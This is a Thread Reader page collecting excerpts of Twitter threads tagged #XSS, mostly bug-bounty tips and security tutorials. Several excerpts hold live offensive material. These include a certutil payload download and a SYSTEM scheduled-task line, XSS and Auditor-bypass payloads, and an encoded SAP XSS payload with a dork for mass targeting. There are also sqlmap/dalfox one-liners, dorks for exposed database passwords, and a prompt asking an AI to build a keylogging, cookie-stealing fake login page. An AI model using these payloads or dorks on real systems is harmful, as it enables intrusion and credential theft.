Discover and read the best of Twitter Threads about #XSS

Most recents (18)

schtasks /create /tn "Task Name" /tr "C:\path\to\program.exe" /sc onstart /ru SYSTEM
DOWNLOAD A PAYLOAD

certutil -urlcache -split -f "example.com/file.exe" C:\path\to\save\file.exe
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f
Read 38 tweets
XSS PoC - AI Generated:

1. platform.openai.com/codex-javascriโ€ฆ
2. Prompt w/ description
3. Export to JSFiddle
4. Host it
5. Include external script
6. Escalate your alert()

#bugbountytips #infosec #xss #ai #GPT

๐Ÿ‘‡๐Ÿงต for Prompt & Code
My prompt:
make a fake login page that's a keylogger and grabs cookies with some styling to make it look like a real login page
XSS PoC JS
Read 6 tweets
Introduction to #XSS

Learn the basics of ๐‚๐ซ๐จ๐ฌ๐ฌ-๐’๐ข๐ญ๐ž ๐’๐œ๐ซ๐ข๐ฉ๐ญ๐ข๐ง๐  (๐—๐’๐’)

Thread๐Ÿงต๐Ÿ‘‡

#bugbounty #bugbountytips #bugbountytip #cybersecurity #cybersecuritytips #infosec #infosecurity #hacking
Let's inspect the name first:

The ๐’๐œ๐ซ๐ข๐ฉ๐ญ๐ข๐ง๐  part indicates, obviously, scripting, so we can think about what kind of scripting we know exist in Web Apps: HTML & JavaScript being the 2 most common.

Secondly, XSS is part of the INJECTION bug class (see @owasp's Top 10)
So, we now know XSS consists of injecting scripts in websites.

Types of XSS:

1. Reflected
2. Stored
3. DOM-based
They can also be Blind too (you don't see the reflection)

As this thread is aimed at beginners, I will focus on the first 2 as they're easier to understand at first
Read 12 tweets
Another new idea for #PenetrationTesting and #Bug-hunting:

Tester:
Enhance the force of #vulnerabilities by doing things like
I discovered a free #URL that leads somewhere else.
Put this in my report and move on ?
To the contrary, changing the #payload allowed me to transform it into a reflected #XSS #vulnerability. Is this the final question?
Obviously not if I have any hope of carrying on.
This web app used #JWT tokens that were transmitted in the bearer header, and for some reason, there were three more cookies that also contained this token.
Only two of them were secure with #HTTP Only.
Just a wild guess.
Read 5 tweets
Bug Testing Methodology Series:

๐—๐’๐’ (๐‚๐ซ๐จ๐ฌ๐ฌ ๐’๐ข๐ญ๐ž ๐’๐œ๐ซ๐ข๐ฉ๐ญ๐ข๐ง๐ )

Learn how to test for #XSS step by step on real #bugbounty programs.

Thread๐Ÿงต๐Ÿ‘‡

#cybersecurity #cybersecuritytips #infosec #hacking #bugbountytips #infosecurity
Before we start, it should be mentioned that this thread will only focus on the testing methodology of XSS, not teaching how it works.

If you don't already know what XSS is, check this out โžก๏ธ portswigger.net/web-security/cโ€ฆ
1๏ธโƒฃ Look for reflections

This is the first step in finding XSS.

Anywhere you see user input is reflected in the response (not limited to what you see on the page, it could be in source code/HTTP response only), note the location/parameter down, that's a potential attack vector.
Read 10 tweets
#learn365 - Day 3โƒฃ2โƒฃ

10 XSS payloads that don't need parentheses ๐Ÿ˜„

#xss #bugbountytips
1. alert`1`

Use backquotes.
2.
window.name="javascript:alert(2)";
location="xss.html";

location=name
Read 11 tweets
If you want to Learn Hacking & Penetration Testing for FREE, read this:
โƒ Metasploit Unleashed

- Free Offensive Security Metasploit course.
- The Metasploit Unleashed (MSFU) course is provided
free of charge by Offensive Security.

๐Ÿ”—
offensive-security.com/metasploit-unlโ€ฆ
โƒ MITRE ATT&CKยฎ

- #MITRE's Adversarial Tactics, Techniques & Common
Knowledge (ATT&CK) - Curated knowledge base and
model for cyber adversary behavior.

๐Ÿ”—
attack.mitre.org/resources/gettโ€ฆ
Read 8 tweets
How I single-handedly bypassed #OpenSea's backend security model for profit. ๐Ÿงต ๐Ÿ‘‡

tl;dr code at github.com/cawfree/openseโ€ฆ
For some background, I've been trying to code the upper hand on #NFT marketplaces for a couple of years now:

github.com/cawfree/openseโ€ฆ
github.com/cawfree/openseโ€ฆ

These are some projects that made it, but there's a mountain of failed attempts that lay hidden behind the scenes.
I would scrape OpenSea's webpages and extract meaningful content from them.

Since most of the content is lazy-loaded via infinite scrolling, I'd use #puppeteer to scroll through the pages for me.

github.com/puppeteer/puppโ€ฆ
Read 25 tweets
Another month has passed so weโ€™re back with the most watched #Angular #meetups from June.

Dive right into internationalization, inject services, smart apps, libraries, providers and much more. Extend your knowledge with the highest-rated #techtalks.

blog.meetupfeed.io/angular-tech-tโ€ฆ
Introduction to Internationalization in Angular via @marktechson

Mark Thompson covers in 15 minutes how to internationalize and localize an #application in #Angular to do exactly what you wish for!

meetupfeed.io/talk/introductโ€ฆ
New Way to Inject Services in #Angular 14 via @DecodedFrontend
Letโ€™s have a look at some base use cases.

meetupfeed.io/talk/new-way-tโ€ฆ
Read 8 tweets
Find an easy #XSS that found all-over the internet.
Dork: inurl:"/irj/portal/" > visit the target, remove "/irj/portal/" from the url & add the payload in 2nd tweet. There are thousands of huge orgs with this #XSS, I reported > 150. Thank me later.#BugBountyTips #infosec
/SAPIrExtHelp/random/"><SVG ONLOAD%3d%26%2397%26%23108%26%23101%26%23114%26%23116(%26%23x64%26%23x6f%26%23x63%26%23x75%26%23x6d%26%23x65%26%23x6e%26%23x74%26%23x2e%26%23x64%26%23x6f%26%23x6d%26%23x61%26%23x69%26%23x6e)>.asp

#SAP
Eg: http://target[.]com/SAPIrExtHelp/random/"><SVG ONLOAD%3d%26%2397%26%23108%26%23101%26%23114%26%23116(%26%23x64%26%23x6f%26%23x63%26%23x75%26%23x6d%26%23x65%26%23x6e%26%23x74%26%23x2e%26%23x64%26%23x6f%26%23x6d%26%23x61%26%23x69%26%23x6e)>.asp if vulnerable boom =>XSS.
Read 5 tweets
#Secret2
Bug Bounty with One-Line Bash Scripts๐Ÿ’ต๐Ÿ˜Ž

You can mention your favorite script. I will add them to this thread.
#BugBounty #BugBountyTip
#100BugBountySecrets
๐Ÿงต๐Ÿ‘‡๐Ÿป
1/ #Secret2

๐ŸŽฏ Hunt #XSS:
๐Ÿ‘‰๐Ÿป cat targets.txt | anew | httpx -silent -threads 500 | xargs -I@ dalfox url @
๐Ÿ‘‰๐Ÿป cat targets.txt | getJS | httpx --match-regex "addEventListener\((?:'|\")message(?:'|\")"

#BugBounty #BugBountyTip
#100BugBountySecrets
๐Ÿงต๐Ÿ‘‡๐Ÿป
2/ #Secret2

๐ŸŽฏ Hunt #SQLi:
๐Ÿ‘‰๐Ÿปhttpx -l targets.txt -silent -threads 1000 | xargs -I@ sh -c 'findomain -t @ -q | httpx -silent | anew | waybackurls | gf sqli >> sqli ; sqlmap -m sqli --batch --random-agent --level 1'

#BugBounty #BugBountyTip
#100BugBountySecrets
๐Ÿงต๐Ÿ‘‡๐Ÿป
Read 13 tweets
This thread brings together all my #infographics until today (2years of work).

These are all infographics about #infosec ๐Ÿ”

Feel free to share this tweet if you think it may be useful for your #community ๐Ÿ“š

Follow me โžก @SecurityGuill fore more about #security #hacking #news ImageImageImageImage
How does an #Antivirus works? Image
Quick presentation of the different #Bluetooth Hacking Techniques Image
Read 44 tweets
Preventing Cross-Site Request Forgery(CSRF) attacks - auth0.com/blog/cross-sitโ€ฆ

#security #websecurity #sec #infosec
what is Cross-Site Request Forgery?

it is a type of attack performed on web apps in order to carry out a malicious action without user's explicit consent.
these 'malicious actions' could be anything. for example: changing email address, personal information etc

#websecurity
how it is performed?

* attacker leads the user to perform an action(through email, website etc)

* attacker makes a request on behalf of the user(by using a hidden form, for example)

* vulnerable website sees it as a genuine action(by verifying session cookie)

#CodeNewbie
Read 8 tweets
Vamos a usar este tweet para publicar #Dorks de todo tipo, empecemos con este:

inurl:wp-config.php intext:DB_PASSWORD -stackoverflow -wpbeginner -foro -forum -topic -blog -about -docs -articles

#CyberSecurity #dork #BugBounty
intext:"pass" ! "usuario" | "user" | "contraseรฑa" filetype:sql -github
Este es muy bueno, nos permite hacer uploads, ha sido probado con imรกgenes .jpeg

intitle:"FCKeditor - Uploaders Tests"
Read 63 tweets
Gonna start a series of tweets about current bypasses in #XSS Auditor, 1 per day.

Bypassing Auditor increases dramatically the success of a XSS attack and the impact of such flaws, affecting users of following major browsers:

Chrome, Opera and Safari.

Stay tuned! ๐Ÿ˜Ž
#XSS Auditor Bypass #1

The easiest one, HTMLi breaking out from script block (it must land where JS syntax is not affected though).

</script><svg><script>alert(1)%0A-->

brutelogic.com.br/xss.php?c1=%3Cโ€ฆ

Notice the source code becomes red flagged (sign of Auditor) but it still executes.
#XSS Auditor Bypass #2

In reflections of URL where payload can be included on its path (like in PHP_SELF vulnerability or friendly URLs).

<link rel=import href='.&#47"><svg%20onload=alert(domain)>'>

brutelogic.com.br/xss.php/%22%3Eโ€ฆ

Support to link imports will end soon though.
Read 8 tweets
1. I'm tweeting a lot these last days, let make a quick recap
2. @Gioneeglobal, a Chinese phone maker who sell his phone in the US under the name @BLU_Product, made a phone for #NorthKorea. Afaik, they didn't make a public statement.

3. @OnePlus removed the #angela backdoor I found last November from his products

Read 18 tweets

Related hashtags

Did Thread Reader help you today?

Support us! We are indie developers!


This site is made by just two indie developers on a laptop doing marketing, support and development! Read more about the story.

Become a Premium Member ($3.00/month or $30.00/year) and get exclusive features!

Become Premium

Too expensive? Make a small donation by buying us coffee ($5) or help with server cost ($10)

Donate via Paypal Become our Patreon

Thank you for your support!